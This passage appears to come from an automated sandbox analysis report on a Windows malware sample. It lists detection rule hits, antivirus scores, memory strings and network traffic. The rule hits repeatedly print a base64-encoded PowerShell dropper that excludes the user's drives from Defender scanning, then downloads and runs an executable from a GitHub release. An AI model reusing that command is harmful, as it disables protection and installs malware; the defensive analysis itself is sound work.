QAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB1AHcAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbABzAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwB2AGMALgBlAHgAZQAnACkAPAAjAGcAZwBtACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exe, ParentProcessId: 7280, ParentProcessName: SecuriteInfo.com.Win32.Evo-gen.6103.10668.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaQBmACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQBy
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 7912, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaQBmACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcABsAHMAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawBpAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcwBwAHIAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwB0AGEAcgB6AGEAbgByAGUALwBtAHkAcgBlAHAAbwAvAHIAZQBsAGUAYQBzAGUAcwAvAGQAbwB3AG4AbABvAGEAZAAvAGEALwBzAHQAZQBhAG0ALgBlAHgAZQAnACwAIAA8ACMAdQBnAGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBkAHEAYQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBjAHoAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBzAHYAYwAuAGUAeABlACcAKQApADwAIwB2AHQAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB1AHcAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbABzAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwB2AGMALgBlAHgAZQAnACkAPAAjAGcAZwBtACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaQBmACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcABsAHMAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawBpAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcwBwAHIAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwB0AGEAcgB6AGEAbgByAGUALwBtAHkAcgBlAHAAbwAvAHIAZQBsAGUAYQBzAGUAcwAvAGQAbwB3AG4AbABvAGEAZAAvAGEALwBzAHQAZQBhAG0ALgBlAHgAZQAnACwAIAA8ACMAdQBnAGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBkAHEAYQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBjAHoAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBzAHYAYwAuAGUAeABlACcAKQApADwAIwB2AHQAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB1AHcAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbABzAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwB2AGMALgBlAHgAZQAnACkAPAAjAGcAZwBtACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exe, ParentProcessId: 7280, ParentProcessName: SecuriteInfo.com.Win32.Evo-gen.6103.10668.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaQBmACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQBy
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
      Source: http://pesterbdd.com/images/Pester.pngSophos S4: Label: malware repository domain
      Source: C:\Users\user\AppData\Local\Temp\nhylsjsvllxf.tmpAvira: detection malicious, Label: HEUR/AGEN.1362795
      Source: C:\Program Files\Google\Chrome\updater.exeReversingLabs: Detection: 79%
      Source: C:\Program Files\Google\Chrome\updater.exeVirustotal: Detection: 67%Perma Link
      Source: C:\Users\user\AppData\Local\Temp\nhylsjsvllxf.tmpReversingLabs: Detection: 86%
      Source: C:\Users\user\AppData\Local\Temp\nhylsjsvllxf.tmpVirustotal: Detection: 80%Perma Link
      Source: C:\Users\user\AppData\Local\Temp\svc.exeReversingLabs: Detection: 79%
      Source: C:\Users\user\AppData\Local\Temp\svc.exeVirustotal: Detection: 67%Perma Link
      Source: SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeReversingLabs: Detection: 65%
      Source: SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeVirustotal: Detection: 67%Perma Link
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
      Source: C:\Users\user\AppData\Local\Temp\svc.exeJoe Sandbox ML: detected
      Source: C:\Program Files\Google\Chrome\updater.exeJoe Sandbox ML: detected
      Source: SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeJoe Sandbox ML: detected
      Source: SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
      Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49731 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49732 version: TLS 1.2
      Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000020.00000000.1831035809.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.2925727518.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000020.00000002.2925161775.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1830984027.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000020.00000002.2924184797.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1830913741.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000020.00000002.2925161775.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1830984027.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000020.00000002.2925161775.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1830984027.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000020.00000002.2925161775.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1830984027.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000020.00000000.1831035809.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.2925727518.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000020.00000002.2925161775.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1830984027.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000020.00000000.1831035809.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.2925727518.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000020.00000002.2924184797.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1830913741.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000020.00000000.1831035809.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.2925727518.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000020.00000002.2925161775.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1830984027.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000020.00000002.2924184797.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1830913741.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000020.00000000.1831035809.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.2925727518.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000020.00000000.1831035809.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.2925727518.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000020.00000002.2924184797.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1830913741.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000020.00000002.2925161775.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1830984027.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000020.00000000.1831035809.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.2925727518.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
      Source: C:\Windows\System32\winlogon.exeCode function: 23_2_00000225DC64BE3C FindFirstFileExW,23_2_00000225DC64BE3C
      Source: C:\Windows\System32\lsass.exeCode function: 24_2_00000202C0AEBE3C FindFirstFileExW,24_2_00000202C0AEBE3C
      Source: C:\Windows\System32\svchost.exeCode function: 25_2_000002A66130BE3C FindFirstFileExW,25_2_000002A66130BE3C
      Source: C:\Windows\System32\dwm.exeCode function: 26_2_000002BAAEDBBE3C FindFirstFileExW,26_2_000002BAAEDBBE3C
      Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000026A879CBE3C FindFirstFileExW,27_2_0000026A879CBE3C
      Source: C:\Windows\System32\svchost.exeCode function: 28_2_00000179537ABE3C FindFirstFileExW,28_2_00000179537ABE3C
      Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002295D56BE3C FindFirstFileExW,29_2_000002295D56BE3C
      Source: C:\Windows\System32\svchost.exeCode function: 30_2_0000025306E6BE3C FindFirstFileExW,30_2_0000025306E6BE3C
      Source: C:\Windows\System32\svchost.exeCode function: 31_2_000001845B3BBE3C FindFirstFileExW,31_2_000001845B3BBE3C
      Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001ADECD4BE3C FindFirstFileExW,32_2_000001ADECD4BE3C
      Source: C:\Windows\System32\svchost.exeCode function: 34_2_000001D55907BE3C FindFirstFileExW,34_2_000001D55907BE3C
      Source: C:\Windows\System32\svchost.exeCode function: 35_2_00000241A9EABE3C FindFirstFileExW,35_2_00000241A9EABE3C
      Source: C:\Windows\System32\svchost.exeCode function: 36_2_000001CD7319BE3C FindFirstFileExW,36_2_000001CD7319BE3C
      Source: C:\Windows\System32\svchost.exeCode function: 37_2_000002824E89BE3C FindFirstFileExW,37_2_000002824E89BE3C
      Source: C:\Windows\System32\svchost.exeCode function: 38_2_0000021B47B3BE3C FindFirstFileExW,38_2_0000021B47B3BE3C
      Source: C:\Windows\System32\svchost.exeCode function: 39_2_000002087006BE3C FindFirstFileExW,39_2_000002087006BE3C
      Source: C:\Windows\System32\svchost.exeCode function: 40_2_000001718426BE3C FindFirstFileExW,40_2_000001718426BE3C
      Source: C:\Windows\System32\svchost.exeCode function: 41_2_0000023FD3FABE3C FindFirstFileExW,41_2_0000023FD3FABE3C
      Source: global trafficHTTP traffic detected: GET /tarzanre/myrepo/releases/download/a/steam.exe HTTP/1.1Host: github.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/672232730/d6a03019-07cf-4d6d-ad93-77d112cc61d1?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240604%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240604T114106Z&X-Amz-Expires=300&X-Amz-Signature=0c3e0f644161a8dc3bf62bb7d99a54823e87ce0d99b2b33952c96ac71daec4b0&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=672232730&response-content-disposition=attachment%3B%20filename%3Dsteam.exe&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 140.82.121.4 140.82.121.4
      Source: Joe Sandbox ViewIP Address: 185.199.110.133 185.199.110.133
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /tarzanre/myrepo/releases/download/a/steam.exe HTTP/1.1Host: github.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/672232730/d6a03019-07cf-4d6d-ad93-77d112cc61d1?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240604%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240604T114106Z&X-Amz-Expires=300&X-Amz-Signature=0c3e0f644161a8dc3bf62bb7d99a54823e87ce0d99b2b33952c96ac71daec4b0&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=672232730&response-content-disposition=attachment%3B%20filename%3Dsteam.exe&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: github.com
      Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
      Source: powershell.exe, 00000001.00000002.1726618411.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1726618411.0000000004A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
      Source: lsass.exe, 00000018.00000002.2947386112.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1778605336.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2947386112.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2947386112.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1778605336.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
      Source: lsass.exe, 00000018.00000000.1778605336.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1775766398.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2932233766.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
      Source: lsass.exe, 00000018.00000000.1775766398.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2932233766.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2947386112.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1778605336.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
      Source: lsass.exe, 00000018.00000000.1778605336.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1775766398.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2932233766.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
      Source: lsass.exe, 00000018.00000002.2947386112.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1778605336.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1777471442.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2947386112.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000003.2257039433.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2947386112.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1778605336.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2945755544.00000202C037F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
      Source: lsass.exe, 00000018.00000000.1778605336.00000202C03C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
      Source: powershell.exe, 00000001.00000002.1726618411.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1726618411.0000000004A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
      Source: powershell.exe, 00000001.00000002.1726618411.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1726618411.0000000004A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: powershell.exe, 00000001.00000002.1726618411.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1726618411.0000000004A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: powershell.exe, 00000001.00000002.1734566307.0000000006D5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
      Source: powershell.exe, 00000001.00000002.1726618411.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1726618411.0000000004A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: lsass.exe, 00000018.00000002.2947386112.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1778605336.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2947386112.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2947386112.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1778605336.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
      Source: lsass.exe, 00000018.00000000.1778605336.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1775766398.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2932233766.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
      Source: lsass.exe, 00000018.00000000.1778605336.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1775766398.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2932233766.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
      Source: lsass.exe, 00000018.00000000.1775766398.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2932233766.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2947386112.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1778605336.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
      Source: lsass.exe, 00000018.00000000.1778605336.00000202C03C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
      Source: powershell.exe, 00000001.00000002.1726618411.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1726618411.0000000004A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
      Source: powershell.exe, 00000001.00000002.1726618411.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1726618411.0000000004A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: powershell.exe, 00000001.00000002.1726618411.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1726618411.0000000004A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: lsass.exe, 00000018.00000002.2947386112.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1778605336.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1777471442.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2947386112.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000003.2257039433.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2947386112.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1778605336.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2945755544.00000202C037F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
      Source: lsass.exe, 00000018.00000002.2937151320.00000202C024E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2947386112.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1776014623.00000202C024C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2947386112.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1778605336.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
      Source: lsass.exe, 00000018.00000002.2947386112.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1778605336.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2947386112.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2947386112.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1778605336.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
      Source: lsass.exe, 00000018.00000000.1775766398.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2932233766.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2947386112.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1778605336.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
      Source: lsass.exe, 00000018.00000000.1778605336.00000202C03C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
